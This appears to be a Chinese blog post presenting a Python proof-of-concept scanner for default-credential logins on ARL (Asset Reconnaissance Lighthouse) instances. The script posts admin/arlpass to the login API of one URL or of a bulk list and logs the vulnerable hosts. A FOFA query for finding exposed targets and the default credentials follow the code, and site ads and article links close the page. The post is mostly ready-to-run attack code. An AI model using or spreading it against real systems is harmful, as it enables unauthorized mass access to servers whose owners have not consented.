资产灯塔弱口令poc
import requests import sys import argparse import urllib3 import re urllib3.disable_warnings() def banner(): print('+---------------------------------------------------+') print('+ \033[1;36m灯塔弱口令 \033[0m +') print('+ \033[1;36m作者:r00t\033[0m +') print('+ \033[1;36mpython3 xxx.py -u/--url http://xxx.xxx.xxx.xxx\033[0m +') print('+ \033[1;36mpython3 xxx.py -f/--file result.txt\033[0m +') print('+ \033[1;36mfofa 语句:body="旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。" \033[0m +') print('+---------------------------------------------------+') if len(sys.argv)==1: banner() sys.exit() parser = argparse.ArgumentParser(description='api help') parser.add_argument('-u','--url', help='Please Input a url!',default='') parser.add_argument('-f','--file', help='Please Input a file!',default='') args=parser.parse_args() url=args.url file=args.file if url!="": url=url+"/api/user/login" header={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36", "Content-Type":"application/json; charset=UTF-8" } data = '{"username":"admin","password":"jz1014944679"}' # proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} response=requests.post(url,data=data,headers=header,verify=False,timeout=10) print(response.text) if ": 200" in response.text and response.status_code == 200: print("\033[1;36m" + url + "\033[0m" + "\033[1;32m 存在漏洞\033[0m") else: print("\033[1;36m"+url+"\033[0m"+"\033[1;31m 不存在漏洞\033[0m") if file!="": txt=file f=open(txt,'r+') for i in f.readlines(): url=i.strip() url=url+"/api/user/login" header={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36", "Content-Type":"application/json; charset=UTF-8" } data = '{"username":"admin","password":"arlpass"}' try: response=requests.post(url,data=data,headers=header,verify=False,timeout=10) if ": 200" in response.text and response.status_code == 200: print("\033[1;36m" + url + "\033[0m" + "\033[1;32m 存在漏洞\033[0m") w = open("10.txt", "a") w.write(url + '\r\n') else: print("\033[1;36m"+url+"\033[0m"+"\033[1;31m 不存在漏洞\033[0m") except Exception as e: print("\033[1;36m"+url+"\033[0m"+"\033[1;31m 不存在漏洞\033[0m",format(e))
fofa语法:
body="旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。"
账号密码为:admin/arlpass
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统